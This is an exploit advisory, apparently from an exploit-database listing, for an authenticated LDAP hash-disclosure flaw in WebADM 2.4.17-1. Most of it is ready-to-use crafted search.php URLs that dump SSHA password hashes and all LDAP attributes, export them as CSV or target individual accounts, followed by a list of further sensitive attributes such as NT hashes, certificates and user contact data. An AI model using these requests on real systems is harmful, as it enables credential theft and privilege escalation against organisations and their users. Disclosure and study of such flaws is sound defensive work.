Share
## https://sploitus.com/exploit?id=PACKETSTORM:219895
# Exploit Title: WebADM v2.4.17-1 - Authenticated LDAP Password Hash
    Disclosure
    # Date: 2026-04-27
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.rcdevs.com/
    # Software Link: https://www.rcdevs.com/downloads/
    # Version: 2.4.17-1 (Freeware Edition)
    # Tested on: Linux, WebADM Freeware Edition
    
    
    # Description:
    # WebADM v2.4.17-1 contains an authenticated information disclosure
    vulnerability
    # in the LDAP search functionality. The `display` parameter in search.php
    accepts
    # any LDAP attribute without server-side validation. A low-privileged admin
    can
    # retrieve SSHA password hashes for ALL LDAP users including super admins
    via a
    # crafted URL, enabling privilege escalation through offline hash cracking.
    
    
    # Proof of Concept:
    #
    # 1. Login to WebADM at:
    #    https://TARGET_IP:10000/admin/
    #
    # 2. After login, note the session ID in URL:
    #    https://TARGET_IP:10000/admin/SESSION_ID/index.php
    #
    # 3. Dump password hashes via direct URL:
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=cn,userpassword&container=dc=nodomain&filter=(objectClass=*)
    #
    # 4. Full LDAP dump (all attributes):
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=*&container=dc=nodomain&filter=(objectClass=*)
    #
    # 5. Export all data as CSV:
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&export=true&display=*&container=dc=nodomain&filter=(objectClass=*)
    #
    # 6. Target specific user:
    #
    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=*&container=dc=nodomain&filter=(cn=admin)
    #
    # Example vulnerable URL (tested on Debian):
    #
    https://192.168.1.104:10000/admin/4FWF711NQTL029JW/search.php?search=true&mode=advanced&scope=sub&display=cn,userpassword&container=dc=nodomain&filter=(objectClass=*)
    #
    # Result:
    # cn=admin,dc=nodomain
    # Password: {SSHA}2wjGZ6opxxxxxxxx
    # cn=svc_webadm,dc=nodomain
    # Password: {SSHA}3qpxxxxxx
    
    # Vulnerable Parameters in URL:
    # display=cn,userpassword    <- Accepts any LDAP attribute (no server-side
    filtering)
    # container=dc=nodomain      <- LDAP base DN to search
    # scope=sub                  <- Searches entire subtree
    # filter=(objectClass=*)     <- Matches all LDAP objects
    # export=true                <- Export all data to CSV file
    
    # Other sensitive attributes accessible via display parameter:
    # display=userpassword       <- SSHA password hashes
    # display=unicodepwd          <- Active Directory NT hashes
    # display=webadmData          <- Encrypted WebADM application data
    # display=webadmSettings      <- WebADM configuration settings
    # display=webadmType          <- Object type definitions
    # display=userCertificate     <- X.509 certificates
    # display=mail,mobile         <- User PII (email, phone numbers)
    # display=member,memberof     <- Group membership/privilege mapping
    # display=*                   <- ALL attributes including OpenLDAP internals
    # display=*+showall=on         <- Return all attributes including internal
    ones